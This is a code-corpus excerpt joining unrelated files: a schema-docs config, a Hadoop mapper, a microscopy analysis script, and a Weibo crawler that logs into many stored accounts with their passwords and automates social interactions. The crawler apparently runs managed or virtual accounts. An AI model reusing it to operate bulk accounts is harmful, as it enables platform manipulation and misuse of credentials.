'Field', 'Type', 'Format', 'Level', 'Definition', 'Example'] tables = ['Study', 'Subject', 'Diagnosis', 'Sample', 'CellProcessing', 'NucleicAcidProcessing', 'PCRTarget', 'SequencingRun', 'RawSequenceData', 'DataProcessing'] # tables = data_elements.keys() miairr_schema = [] with open(os.path.join(download_path, '%s.tsv' % 'AIRR_Minimal_Standard_Data_Elements'), 'w') as f: writer = csv.DictWriter(f, fieldnames=fields, dialect='excel-tab', extrasaction='ignore') writer.writeheader() for spec in tables: for r in data_elements[spec]: if r['Level'] and not r['Deprecated']: miairr_schema.append(r) writer.writerow(r) html_context['MiAIRR_schema'] = miairr_schema # Write individual spec TSVs fields = ['Name', 'Type', 'Attributes', 'Definition'] tables = ['Repertoire', 'Study', 'Subject', 'Diagnosis', 'Sample', 'CellProcessing', 'NucleicAcidProcessing', 'PCRTarget', 'SequencingRun', 'RawSequenceData', 'DataProcessing', 'Rearrangement', 'Alignment', 'Clone', 'Tree', 'Node', 'Cell', 'RearrangedSequence', 'UnrearrangedSequence', 'SequenceDelineationV', 'AlleleDescription', 'GermlineSet', 'GenotypeSet', 'Genotype', 'MHCGenotypeSet', 'MHCGenotype'] for spec in tables: with open(os.path.join(download_path, '%s.tsv' % spec), 'w') as f: writer = csv.DictWriter(f, fieldnames=fields, dialect='excel-tab', extrasaction='ignore') writer.writeheader() writer.writerows(data_elements[spec]) # -- Site configuration from schema data ---------------------------------- # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = str(airr_schema['Info']['version']) # The full version, including alpha/beta/rc tags. release = str(airr_schema['Info']['version'])
1.625
2
A10/mapper.py
lrodrin/masterAI
2
12789947
#!/usr/bin/env python #coding=utf-8 """mapper.py""" import sys # los datos de entrada vienen por STDIN (standard input) for line in sys.stdin: # quitamos espacios de principio y fin de línea line = line.strip() # partimos la línea en palabras words = line.split() for word in words: # se escriben los resultados del map a STDOUT (standard output); # lo que salga de aquí será la entrada del reducer.py # clave-valor separados por tabulador # ponemos recuento 1 en cada palabra, para luego acumular los recuentos por palabra print('%s\t%s' % (word, 1))
3.640625
4
xnr/WeiboCrawler.py
BingquLee/spiders
0
12789948
import time from selenium import webdriver from SinaLauncher import SinaLauncher class WeiboCrawler(object): def __init__(self): self.driver = webdriver.Firefox() def get_present_time(self): present_time_stamp = time.localtime(int(time.time())) present_time = time.strftime("%Y-%m-%d %H:%M:%S", present_time_stamp) year = int(present_time.split(" ")[0].split("-")[0]) month = int(present_time.split(" ")[0].split("-")[1]) day = int(present_time.split(" ")[0].split("-")[2]) hour = int(present_time.split(" ")[1].split(":")[0]) minute = int(present_time.split(" ")[1].split(":")[1]) second = int(present_time.split(" ")[1].split(":")[2]) return year, month, day, hour, minute, second def all_weibo_xnr_crawler(self): query_body = { 'query': {'term': {'create_status': 2}}, 'size': 10000 } search_results = es.search(index=weibo_xnr_index_name, doc_type=weibo_xnr_index_type, body=query_body)['hits']['hits'] if search_results: for result in search_results: result = result['_source'] mail_account = result['weibo_mail_account'] phone_account = result['weibo_phone_account'] pwd = result['password'] if mail_account: account_name = mail_account elif phone_account: account_name = phone_account else: account_name = False if account_name: self.execute(account_name, pwd) def execute(self, uname, upasswd): xnr = SinaLauncher(uname, upasswd) print xnr.login() print 'uname::', uname uid = xnr.uid current_ts = int(time.time()) timestamp_retweet, timestamp_like, timestamp_at, timestamp_private, \ timestamp_comment_receive, timestamp_comment_make = self.newest_time_func(xnr.uid) print timestamp_retweet, timestamp_like, timestamp_at, \ timestamp_private, timestamp_comment_receive, timestamp_comment_make # try: print 'start run weibo_feedback_follow.py ...' fans, follow, groups = self.FeedbackFollow(xnr.uid, current_ts).execute() print 'run weibo_feedback_follow.py done!' # except: # print 'Except Abort' # try: print 'start run weibo_feedback_at.py ...' self.FeedbackAt(xnr.uid, current_ts, fans, follow, groups, timestamp_at).execute() print 'run weibo_feedback_at.py done!' print 'start run weibo_feedback_comment.py ...' self.FeedbackComment(xnr.uid, current_ts, fans, follow, groups, timestamp_comment_make, timestamp_comment_receive).execute() print 'run weibo_feedback_comment.py done!' print 'start run weibo_feedback_like.py ...' self.FeedbackLike(xnr.uid, current_ts, fans, follow, groups, timestamp_like).execute() print 'run weibo_feedback_like.py done!' print 'start run weibo_feedback_private.py ...' # print 'timestamp_private:::',timestamp_private # print 'current_ts::::::',current_ts self.FeedbackPrivate(xnr.uid, current_ts, fans, follow, groups, timestamp_private).execute() print 'run weibo_feedback_private.py done!' print 'start run weibo_feedback_retweet.py ...' self.FeedbackRetweet(xnr.uid, current_ts, fans, follow, groups, timestamp_retweet).execute() print 'run weibo_feedback_retweet.py done!'
2.96875
3
experiments/bin_plot_11.02.21-BPE_Pressure_Deflection_20X.py
sean-mackenzie/gdpyt-analysis
0
12789949
# test bin, analyze, and plot functions # imports import os from os.path import join from os import listdir import matplotlib.pyplot as plt # imports import numpy as np import pandas as pd from scipy.optimize import curve_fit import filter import analyze from correction import correct from utils import fit, functions, bin, io, plotting, modify, plot_collections from utils.plotting import lighten_color # A note on SciencePlots colors """ Blue: #0C5DA5 Green: #00B945 Red: #FF9500 Orange: #FF2C00 Other Colors: Light Blue: #7BC8F6 Paler Blue: #0343DF Azure: #069AF3 Dark Green: #054907 """ sciblue = '#0C5DA5' scigreen = '#00B945' scired = '#FF9500' sciorange = '#FF2C00' plt.style.use(['science', 'ieee', 'std-colors']) fig, ax = plt.subplots() size_x_inches, size_y_inches = fig.get_size_inches() plt.close(fig) # ---------------------------------------------------------------------------------------------------------------------- # 1. SETUP - BASE DIRECTORY base_dir = '/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/' # ---------------------------------------------------------------------------------------------------------------------- # 2. SETUP - IDPT path_idpt = join(base_dir, 'results-04.26.22_idpt') path_test_coords = join(path_idpt, 'coords/test-coords') path_calib_coords = join(path_idpt, 'coords/calib-coords') path_similarity = join(path_idpt, 'similarity') path_results = join(path_idpt, 'results') path_figs = join(path_idpt, 'figs') # ---------------------------------------------------------------------------------------------------------------------- # ---------------------------------------------------------------------------------------------------------------------- # 3. ANALYSIS - READ FILES method = 'idpt' microns_per_pixel = 0.8 # ----- 4.1 CORRECT TEST COORDS correct_test_coords = False if correct_test_coords: use_idpt_zf = False use_spct_zf = False # ------------------------------------------------------------------------------------------------------------------ if use_idpt_zf: """ NOTE: This correction scheme fits a 2D spline to the in-focus particle positions and uses this to set their z_f = 0 position. """ param_zf = 'zf_from_peak_int' plot_calib_plane = False plot_calib_spline = False kx, ky = 2, 2 # step 1. read calibration coords dfc, dfcpid, dfcpop, dfcstats = io.read_calib_coords(path_calib_coords, method) # step 2. remove outliers # 2.1 get z_in-focus mean + standard deviation zf_c_mean = dfcpid[param_zf].mean() zf_c_std = dfcpid[param_zf].std() # 2.2 filter calibration coords dfcpid = dfcpid[(dfcpid[param_zf] > zf_c_mean - zf_c_std) & (dfcpid[param_zf] < zf_c_mean + zf_c_std)] # step 3. fit plane dictc_fit_plane = correct.fit_in_focus_plane(df=dfcpid, param_zf=param_zf, microns_per_pixel=microns_per_pixel) popt_c = dictc_fit_plane['popt_pixels'] if plot_calib_plane: fig = plotting.plot_fitted_plane_and_points(df=dfcpid, dict_fit_plane=dictc_fit_plane) plt.savefig(path_figs + '/idpt-calib-coords_fit-plane_raw.png') plt.close() dfict_fit_plane = pd.DataFrame.from_dict(dictc_fit_plane, orient='index', columns=['value']) dfict_fit_plane.to_excel(path_figs + '/idpt-calib-coords_fit-plane_raw.xlsx') # step 4. FIT SMOOTH 2D SPLINE AND PLOT RAW POINTS + FITTED SURFACE (NO CORRECTION) bispl_c, rmse_c = fit.fit_3d_spline(x=dfcpid.x, y=dfcpid.y, z=dfcpid[param_zf], kx=kx, ky=ky) if plot_calib_spline: fig, ax = plotting.scatter_3d_and_spline(dfcpid.x, dfcpid.y, dfcpid[param_zf], bispl_c, cmap='RdBu', grid_resolution=30, view='multi') ax.set_xlabel('x (pixels)') ax.set_ylabel('y (pixels)') ax.set_zlabel(r'$z_{f} \: (\mu m)$') plt.suptitle('fit RMSE = {}'.format(np.round(rmse_c, 3))) plt.savefig(path_figs + '/idpt-calib-coords_fit-spline_kx{}_ky{}.png'.format(kx, ky)) plt.close() # step 5. read test_coords dft = io.read_test_coords(path_test_coords) # step 6. drop unnecessary columns in dft dft = dft[['frame', 'id', 'z', 'z_true', 'x', 'y', 'cm', 'error']] # step 7. create a z_corr column by using fitted spline to correct z dft = correct.correct_z_by_spline(dft, bispl=bispl_c, param_z='z') dft['z_true_corr'] = dft['z_true'] - dft['z_cal_surf'] # step 8. export corrected test_coords dft.to_excel(path_results + '/test_coords_corrected_t-calib2_c-calib1.xlsx', index=False) elif use_spct_zf: """ NOTE: No correction is currently performed. The z-coords are well aligned enough in both calibration image sets to just ignore. This is not necessarily surprising because the calibration images were acquired with the intention of making the z-coords identical for all calibration image sets (by using the same beginning and ending tick mark on the fine adjustment knob during image acquisition). """ # -------------------------------------------------------------------------------------------------------------- # SETUP - SPCT CALIBRATION IN-FOCUS COORDS # SPCT analysis of images used for IDPT calibration path_spct_calib_coords = join(base_dir, 'results-04.26.22_spct_calib1_test-2-3/coords/calib-coords') path_calib_pid_defocus = join(path_spct_calib_coords, 'calib_spct_pid_defocus_stats_c-calib1_t-calib2.xlsx') path_calib_spct_stats = join(path_spct_calib_coords, 'calib_spct_stats_c-calib1_t-calib2.xlsx') path_calib_spct_pop = join(path_spct_calib_coords, 'calib_spct_pop_defocus_stats_c-calib1_t-calib2.xlsx') # SPCT analysis of images used for IDPT test path_spct_test_coords = join(base_dir, 'results-04.28.22_spct-calib2_test3/coords/calib-coords') path_test_pid_defocus = join(path_spct_test_coords, 'calib_spct_pid_defocus_stats_c-calib2_t-calib3.xlsx') path_test_spct_stats = join(path_spct_test_coords, 'calib_spct_stats_c-calib2_t-calib3.xlsx') path_test_spct_pop = join(path_spct_test_coords, 'calib_spct_pop_defocus_stats_c-calib2_t-calib3.xlsx') # -------------------------------------------------------------------------------------------------------------- # --- PART A. READ COORDS USED FOR IDPT CALIBRATION (i.e. 'calib1') merge_spct_stats = True param_zf = 'zf_from_peak_int' plot_calib_plane = True plot_test_plane = True kx, ky = 2, 2 # step 1. merge [['x', 'y']] into spct pid defocus stats. if merge_spct_stats: # read SPCT calibration coords and merge ['x', 'y'] into pid_defocus_stats dfcpid = pd.read_excel(path_calib_pid_defocus) dfcstats = pd.read_excel(path_calib_spct_stats) dfcpid = modify.merge_calib_pid_defocus_and_correction_coords(path_calib_coords, method, dfs=[dfcstats, dfcpid]) else: # read SPCT pid defocus stats that have already been merged path_calib_pid_defocus = join(path_calib_coords, 'calib_spct_pid_defocus_stats_calib1_xy.xlsx') dfcpid = pd.read_excel(path_calib_pid_defocus) # step 2. remove outliers # 2.1 get z_in-focus mean + standard deviation zf_c_mean = dfcpid[param_zf].mean() zf_c_std = dfcpid[param_zf].std() # 2.2 filter calibration coords dfcpid = dfcpid[(dfcpid[param_zf] > 34) & (dfcpid[param_zf] < zf_c_mean + zf_c_std / 2)] dfcpid = dfcpid[dfcpid['x'] > 120] # step 3. fit plane dictc_fit_plane = correct.fit_in_focus_plane(df=dfcpid, param_zf=param_zf, microns_per_pixel=microns_per_pixel) popt_c = dictc_fit_plane['popt_pixels'] if plot_calib_plane: fig = plotting.plot_fitted_plane_and_points(df=dfcpid, dict_fit_plane=dictc_fit_plane) plt.savefig(path_figs + '/calibration-coords_fit-plane_raw.png') plt.close() dfict_fit_plane = pd.DataFrame.from_dict(dictc_fit_plane, orient='index', columns=['value']) dfict_fit_plane.to_excel(path_figs + '/calibration-coords_fit-plane_raw.xlsx') # FIT SMOOTH 2D SPLINE AND PLOT RAW POINTS + FITTED SURFACE (NO CORRECTION) bispl_c, rmse_c = fit.fit_3d_spline(x=dfcpid.x, y=dfcpid.y, z=dfcpid[param_zf], kx=kx, ky=ky) fig, ax = plotting.scatter_3d_and_spline(dfcpid.x, dfcpid.y, dfcpid[param_zf], bispl_c, cmap='RdBu', grid_resolution=30, view='multi') ax.set_xlabel('x (pixels)') ax.set_ylabel('y (pixels)') ax.set_zlabel(r'$z_{f} \: (\mu m)$') plt.suptitle('fit RMSE = {}'.format(np.round(rmse_c, 3))) plt.savefig(path_figs + '/calibration-coords_fit-spline_kx{}_ky{}.png'.format(kx, ky)) plt.close() # --- # --- PART B. READ COORDS USED FOR IDPT TEST (i.e. 'calib2') # step 1. merge [['x', 'y']] into spct pid defocus stats. if merge_spct_stats: # read SPCT calibration coords and merge ['x', 'y'] into pid_defocus_stats dfcpid = pd.read_excel(path_test_pid_defocus) dfcstats = pd.read_excel(path_test_spct_stats) dfcpid = modify.merge_calib_pid_defocus_and_correction_coords(path_calib_coords, method, dfs=[dfcstats, dfcpid]) else: # read SPCT pid defocus stats that have already been merged path_calib_pid_defocus = join(path_calib_coords, 'calib_spct_pid_defocus_stats_calib2_xy.xlsx') dfcpid = pd.read_excel(path_calib_pid_defocus) # step 2. remove outliers # 2.1 get z_in-focus mean + standard deviation zf_c_mean = dfcpid[param_zf].mean() zf_c_std = dfcpid[param_zf].std() # 2.2 filter calibration coords dfcpid = dfcpid[(dfcpid[param_zf] > zf_c_mean - zf_c_std / 2) & (dfcpid[param_zf] < zf_c_mean + zf_c_std / 2)] # step 3. fit plane dictc_fit_plane = correct.fit_in_focus_plane(df=dfcpid, param_zf=param_zf, microns_per_pixel=microns_per_pixel) popt_c = dictc_fit_plane['popt_pixels'] if plot_test_plane: fig = plotting.plot_fitted_plane_and_points(df=dfcpid, dict_fit_plane=dictc_fit_plane) plt.savefig(path_figs + '/test-coords_fit-plane_raw.png') plt.close() dfict_fit_plane = pd.DataFrame.from_dict(dictc_fit_plane, orient='index', columns=['value']) dfict_fit_plane.to_excel(path_figs + '/test-coords_fit-plane_raw.xlsx') # FIT SMOOTH 2D SPLINE AND PLOT RAW POINTS + FITTED SURFACE (NO CORRECTION) bispl_c, rmse_c = fit.fit_3d_spline(x=dfcpid.x, y=dfcpid.y, z=dfcpid[param_zf], kx=kx, ky=ky) fig, ax = plotting.scatter_3d_and_spline(dfcpid.x, dfcpid.y, dfcpid[param_zf], bispl_c, cmap='RdBu', grid_resolution=30, view='multi') ax.set_xlabel('x (pixels)') ax.set_ylabel('y (pixels)') ax.set_zlabel(r'$z_{f} \: (\mu m)$') plt.suptitle('fit RMSE = {}'.format(np.round(rmse_c, 3))) plt.savefig(path_figs + '/test-coords_fit-spline_kx{}_ky{}.png'.format(kx, ky)) plt.close() # ---------------------------------------------------------------------------------------------------------------------- # 4. PLOT TEST COORDS RMSE-Z analyze_test_coords = False save_plots = False show_plots = False if analyze_test_coords: # read test coords dft = io.read_test_coords(path_test_coords) # test coords stats mag_eff = 20.0 area_pixels = 512 ** 2 area_microns = (512 * microns_per_pixel) ** 2 i_num_rows = len(dft) i_num_pids = len(dft.id.unique()) # --- # --- STEP 0. drop and rename columns for simplicity dft = dft.drop(columns=['z', 'z_true']) dft = dft.rename(columns={'z_corr': 'z', 'z_true_corr': 'z_true'}) # --- rmse_all_particles = False rmse_on_off_bpe = False rmse_compare = False # format plots xylim = 37.25 xyticks = [-30, -15, 0, 15, 30] lbls = ['On', 'Border', 'Off'] markers = ['s', 'd', 'o'] if rmse_all_particles: # --- STEP 1. CALCULATE RMSE-Z FOR ALL PARTICLES column_to_bin = 'z_true' bins_z = 20 round_z_to_decimal = 3 min_cm = 0.5 # 1.1 mean rmse-z dfrmse_mean = bin.bin_local_rmse_z(dft, column_to_bin=column_to_bin, bins=1, min_cm=min_cm, z_range=None, round_to_decimal=round_z_to_decimal, df_ground_truth=None, dropna=True, error_column='error', ) dfrmse_mean.to_excel(path_results + '/mean-rmse-z_bin=1_no-filters.xlsx') # 1.2 binned rmse-z dfrmse = bin.bin_local_rmse_z(dft, column_to_bin=column_to_bin, bins=bins_z, min_cm=min_cm, z_range=None, round_to_decimal=round_z_to_decimal, df_ground_truth=None, dropna=True, error_column='error', ) dfrmse.to_excel(path_results + '/binned-rmse-z_bins={}_no-filters.xlsx'.format(bins_z)) # 1.3 groupby 'bin' rmse-z mean + std dfrmsem, dfrmsestd = bin.bin_generic(dft, column_to_bin='bin', column_to_count='id', bins=bins_z, round_to_decimal=round_z_to_decimal, return_groupby=True) # 1.3 plot binned rmse-z if save_plots or show_plots: # close all figs plt.close('all') # ----------------------- BASIC RMSE-Z PLOTS # rmse-z: microns fig, ax = plt.subplots() ax.plot(dfrmse.index, dfrmse.rmse_z, '-o') ax.set_xlabel(r'$z_{true} \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(ticks=xyticks, labels=xyticks) ax.set_ylabel(r'$\sigma_{z} \: (\mu m)$') plt.tight_layout() if save_plots: plt.savefig(path_figs + '/rmse-z_microns.png') if show_plots: plt.show() plt.close() # ----------------------- Z-MEAN +/- Z-STD PLOTS # fit line popt, pcov = curve_fit(functions.line, dfrmse.z_true, dfrmse.z) z_fit = np.linspace(dfrmse.z_true.min(), dfrmse.z_true.max()) rmse_fit_line = np.sqrt(np.sum((functions.line(dfrmse.z_true, *popt) - dfrmse.z)**2) / len(dfrmse.z)) print(rmse_fit_line) # binned calibration curve with std-z errorbars (microns) + fit line fig, ax = plt.subplots() ax.errorbar(dfrmsem.z_true, dfrmsem.z, yerr=dfrmsestd.z, fmt='o', ms=3, elinewidth=0.5, capsize=1, color=sciblue, label=r'$\overline{z} \pm \sigma$') # ax.plot(z_fit, functions.line(z_fit, *popt), linestyle='--', linewidth=1.5, color='black', alpha=0.25, label=r'$dz/dz_{true} = $' + ' {}'.format(np.round(popt[0], 3))) ax.set_xlabel(r'$z_{true} \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(ticks=xyticks, labels=xyticks) ax.set_ylabel(r'$z \: (\mu m)$') ax.set_ylim([-xylim, xylim]) ax.set_yticks(ticks=xyticks, labels=xyticks) ax.legend(loc='lower right', handletextpad=0.25, borderaxespad=0.3) plt.tight_layout() if save_plots: plt.savefig(path_figs + '/calibration_curve_z+std-errobars_fit_line_a{}_b{}_slope-label-blk.png'.format( np.round(popt[0], 3), np.round(popt[1], 3)) ) if show_plots: plt.show() plt.close() if rmse_on_off_bpe: # --- STEP 0. SPLIT DATAFRAME INTO (1) OFF BPE and (2) OFF BPE. column_to_bin = 'x' bins_x = [145, 175, 205] round_x_to_decimal = 0 dfbx = bin.bin_by_list(dft, column_to_bin=column_to_bin, bins=bins_x, round_to_decimal=round_x_to_decimal, ) df_on = dfbx[dfbx['bin'] == bins_x[0]] df_edge = dfbx[dfbx['bin'] == bins_x[1]] df_off = dfbx[dfbx['bin'] == bins_x[2]] # --- plotting # --- STEP 1. PLOT CALIBRATION CURVE (Z VS. Z_TRUE) FOR EACH DATAFRAME (ON, EDGE, OFF) ss = 1 fig, ax = plt.subplots() ax.scatter(df_off.z_true, df_off.z, s=ss, marker=markers[2], color=sciblue, label=lbls[2]) ax.scatter(df_on.z_true, df_on.z, s=ss, marker=markers[0], color=sciorange, label=lbls[0]) ax.scatter(df_edge.z_true, df_edge.z, s=ss, marker=markers[1], color=scired, label=lbls[1]) ax.set_xlabel(r'$z_{true} \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(ticks=xyticks, labels=xyticks) ax.set_ylabel(r'$z \: (\mu m)$') ax.set_ylim([-xylim, xylim]) ax.set_yticks(ticks=xyticks, labels=xyticks) ax.legend(loc='lower right', markerscale=2.5) plt.tight_layout() if save_plots: plt.savefig(path_figs + '/on-edge-off-bpe_calibration_curve.png') if show_plots: plt.show() plt.close() # --- STEP 2. FOR EACH DATAFRAME (ON, EDGE, OFF), COMPUTE RMSE-Z AND PLOT for lbl, dft in zip(lbls, [df_on, df_edge, df_off]): # --- STEP 1. CALCULATE RMSE-Z FOR ALL PARTICLES column_to_bin = 'z_true' bins_z = 20 round_z_to_decimal = 3 min_cm = 0.5 # 1.1 mean rmse-z dfrmse_mean = bin.bin_local_rmse_z(dft, column_to_bin=column_to_bin, bins=1, min_cm=min_cm, z_range=None, round_to_decimal=round_z_to_decimal, df_ground_truth=None, dropna=True, error_column='error', ) dfrmse_mean.to_excel(path_results + '/{}_mean-rmse-z_bin=1_no-filters.xlsx'.format(lbl)) # 1.2 binned rmse-z dfrmse = bin.bin_local_rmse_z(dft, column_to_bin=column_to_bin, bins=bins_z, min_cm=min_cm, z_range=None, round_to_decimal=round_z_to_decimal, df_ground_truth=None, dropna=True, error_column='error', ) dfrmse.to_excel(path_results + '/{}_binned-rmse-z_bins={}_no-filters.xlsx'.format(lbl, bins_z)) # 1.3 groupby 'bin' rmse-z mean + std dfrmsem, dfrmsestd = bin.bin_generic(dft, column_to_bin='bin', column_to_count='id', bins=bins_z, round_to_decimal=round_z_to_decimal, return_groupby=True) # 1.3 plot binned rmse-z if save_plots or show_plots: # close all figs plt.close('all') # ----------------------- BASIC RMSE-Z PLOTS # rmse-z: microns fig, ax = plt.subplots() ax.plot(dfrmse.index, dfrmse.rmse_z, '-o') ax.set_xlabel(r'$z_{true} \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(ticks=xyticks, labels=xyticks) ax.set_ylabel(r'$\sigma_{z} \: (\mu m)$') plt.tight_layout() if save_plots: plt.savefig(path_figs + '/{}_rmse-z_microns.png'.format(lbl)) if show_plots: plt.show() plt.close() # ----------------------- Z-MEAN +/- Z-STD PLOTS # fit line popt, pcov = curve_fit(functions.line, dfrmse.z_true, dfrmse.z) z_fit = np.linspace(dfrmse.z_true.min(), dfrmse.z_true.max()) rmse_fit_line = np.sqrt(np.sum((functions.line(dfrmse.z_true, *popt) - dfrmse.z) ** 2) / len(dfrmse.z)) print(rmse_fit_line) # binned calibration curve with std-z errorbars (microns) + fit line fig, ax = plt.subplots() ax.errorbar(dfrmsem.z_true, dfrmsem.z, yerr=dfrmsestd.z, fmt='o', ms=3, elinewidth=0.5, capsize=1, color=sciblue, label=r'$\overline{z} \pm \sigma$') # ax.plot(z_fit, functions.line(z_fit, *popt), linestyle='--', linewidth=1.5, color='black', alpha=0.25, label=r'$dz/dz_{true} = $' + ' {}'.format(np.round(popt[0], 3))) ax.set_xlabel(r'$z_{true} \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(ticks=xyticks, labels=xyticks) ax.set_ylabel(r'$z \: (\mu m)$') ax.set_ylim([-xylim, xylim]) ax.set_yticks(ticks=xyticks, labels=xyticks) ax.legend(loc='lower right', handletextpad=0.25, borderaxespad=0.3) plt.tight_layout() if save_plots: plt.savefig(path_figs + '/{}_calibration_curve_z+std-errobars_fit_line_a{}_b{}_slope-label-blk.png'.format( lbl, np.round(popt[0], 3), np.round(popt[1], 3)) ) if show_plots: plt.show() plt.close() if rmse_compare: # 1. read binned rmse-z dataframes from Excel path_rmse_compare = join(path_results, 'on-edge-off-bpe') df1 = pd.read_excel(join(path_rmse_compare, '{}_binned-rmse-z_bins=20_no-filters.xlsx'.format(lbls[0]))) df2 = pd.read_excel(join(path_rmse_compare, '{}_binned-rmse-z_bins=20_no-filters.xlsx'.format(lbls[1]))) df3 = pd.read_excel(join(path_rmse_compare, '{}_binned-rmse-z_bins=20_no-filters.xlsx'.format(lbls[2]))) # 1.3 plot binned rmse-z if save_plots or show_plots: ms = 4 # ----------------------- BASIC RMSE-Z PLOTS # rmse-z: microns fig, ax = plt.subplots() ax.plot(df3.bin, df3.rmse_z, '-o', ms=ms, label=lbls[2], color=sciblue) ax.plot(df2.bin, df2.rmse_z, '-o', ms=ms, label=lbls[1], color=scired) ax.plot(df1.bin, df1.rmse_z, '-o', ms=ms, label=lbls[0], color=sciorange) ax.set_xlabel(r'$z_{true} \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(ticks=xyticks, labels=xyticks) ax.set_ylabel(r'$\sigma_{z} \: (\mu m)$') ax.legend() plt.tight_layout() if save_plots: plt.savefig(path_figs + '/compare-on-edge-off-bpe_rmse-z_microns.png') if show_plots: plt.show() plt.close() # rmse-z (microns) + c_m darken_clr = 1.0 alpha_clr = 1.0 fig, [axr, ax] = plt.subplots(nrows=2, sharex=True, gridspec_kw={'height_ratios': [1, 2]}) axr.plot(df3.bin, df3.cm, '-', ms=ms-2, marker=markers[2], color=sciblue) axr.plot(df2.bin, df2.cm, '-', ms=ms-2, marker=markers[1], color=scired) axr.plot(df1.bin, df1.cm, '-', ms=ms-2, marker=markers[0], color=sciorange) axr.set_ylabel(r'$c_{m}$') ax.plot(df3.bin, df3.rmse_z, '-', ms=ms-0.75, marker=markers[2], color=sciblue, label=lbls[2]) ax.plot(df2.bin, df2.rmse_z, '-', ms=ms-0.75, marker=markers[1], color=scired, label=lbls[1]) ax.plot(df1.bin, df1.rmse_z, '-', ms=ms-0.75, marker=markers[0], color=sciorange, label=lbls[0]) ax.set_xlabel(r'$z_{true} \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(ticks=xyticks, labels=xyticks) ax.set_ylabel(r'$\sigma_{z} \: (\mu m)$') ax.legend() plt.tight_layout() if save_plots: plt.savefig(path_figs + '/compare-on-edge-off-bpe_rmse-z_microns_cm.png') if show_plots: plt.show() plt.close() # ---------------------------------------------------------------------------------------------------------------------- # 5. IDPT VS. SPCT - COMPARE NUMBER OF PARTICLES PER Z compare_idpt_spct = False save_plots = False show_plots = False if compare_idpt_spct: # --- 1. IDPT # read IDPT test coords dft = io.read_test_coords(path_test_coords) # test coords stats mag_eff = 20.0 area_pixels = 512 ** 2 area_microns = (512 * microns_per_pixel) ** 2 i_num_rows = len(dft) i_num_pids = len(dft.id.unique()) dft = dft.drop(columns=['z', 'z_true']) dft = dft.rename(columns={'z_corr': 'z', 'z_true_corr': 'z_true'}) # --- 2. SPCT # 2.1 read SPCT off-bpe test coords dfs_off = pd.read_excel('/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/results-04.26.22_spct_calib1_test-2-3/coords/test-coords/test_coords_t-calib2_c-calib1.xlsx') dfs_on = pd.read_excel('/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/results-04.26.22_spct_stack-id-on-bpe/testcalib2_calcalib1/test_coords_t_20X_ccalib1_tcalib2_c_20X_tcalib2_ccalib1_2022-04-26 20:45:34.334931.xlsx') # 2.2 correct z by mean z_f from peak_intensity z_f_mean = 35.1 dfs_off['z'] = dfs_off['z'] - z_f_mean dfs_off['z_true'] = dfs_off['z_true'] - z_f_mean dfs_on['z'] = dfs_on['z'] - z_f_mean dfs_on['z_true'] = dfs_on['z_true'] - z_f_mean # --- 3. GROUPBY Z_TRUE dftg = dft.copy() dftg = dftg.round({'z_true': 0}) dftc = dftg.groupby('z_true').count().reset_index() dfs_offc = dfs_off.groupby('z_true').count().reset_index() dfs_onc = dfs_on.groupby('z_true').count().reset_index() # filter z_true for pretty plotting zlim = 35 dftc = dftc[(dftc['z_true'] > -zlim) & (dftc['z_true'] < zlim)] dfs_offc = dfs_offc[(dfs_offc['z_true'] > -zlim) & (dfs_offc['z_true'] < zlim)] dfs_onc = dfs_onc[(dfs_onc['z_true'] > -zlim) & (dfs_onc['z_true'] < zlim)] # --- # --- plotting # format plots xylim = 37.25 xyticks = [-30, -15, 0, 15, 30] ms = 3 # FIGURE 1. PLOT NUMBER OF PARTICLES PER Z_TRUE fig, ax = plt.subplots() ax.plot(dftc.z_true, dftc.z, '-o', ms=ms, color=sciblue, label=r'$IDPT$') ax.plot(dfs_offc.z_true, dfs_offc.z, '-o', ms=ms, color=lighten_color(scigreen, 1.0), label=r'$SPCT_{Low}$') ax.plot(dfs_onc.z_true, dfs_onc.z, '-o', ms=ms, color=lighten_color(scigreen, 1.2), label=r'$SPCT_{High}$') ax.set_xlabel(r'$z \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(xyticks) ax.set_ylabel(r'$N_{p} \: (\#)$') ax.set_ylim([0, 200]) ax.legend() plt.tight_layout() if save_plots: plt.savefig(path_figs + '/compare-idpt-spct_num-particles.png') if show_plots: plt.show() plt.close() # --- # FIGURE 2. PLOT NUMBER OF PARTICLES PER Z_TRUE AND CM dftm = dftg.groupby('z_true').mean().reset_index() dfs_offm = dfs_off.groupby('z_true').mean().reset_index() dfs_onm = dfs_on.groupby('z_true').mean().reset_index() # filter z_true for pretty plotting dftm = dftm[(dftm['z_true'] > -zlim) & (dftm['z_true'] < zlim)] dfs_offm = dfs_offm[(dfs_offm['z_true'] > -zlim) & (dfs_offm['z_true'] < zlim)] dfs_onm = dfs_onm[(dfs_onm['z_true'] > -zlim) & (dfs_onm['z_true'] < zlim)] # plot fig, [axr, ax] = plt.subplots(nrows=2, sharex=True, gridspec_kw={'height_ratios': [1, 2]}) axr.plot(dftm.z_true, dftm.cm, '-o', ms=ms - 1, color=sciblue) axr.plot(dfs_offm.z_true, dfs_offm.cm, '-o', ms=ms - 1, color=lighten_color(scigreen, 1.0)) axr.plot(dfs_onm.z_true, dfs_onm.cm, '-o', ms=ms - 1, color=lighten_color(scigreen, 1.2)) axr.set_ylabel(r'$c_{m}$') axr.set_ylim([0.790, 1.01]) axr.set_yticks([0.8, 0.9, 1.0]) ax.plot(dftc.z_true, dftc.z, '-o', ms=ms, color=sciblue, label=r'$IDPT$') ax.plot(dfs_offc.z_true, dfs_offc.z, '-o', ms=ms, color=lighten_color(scigreen, 1.0), label=r'$SPCT_{Low}$') ax.plot(dfs_onc.z_true, dfs_onc.z, '-o', ms=ms, color=lighten_color(scigreen, 1.2), label=r'$SPCT_{High}$') ax.set_xlabel(r'$z \: (\mu m)$') 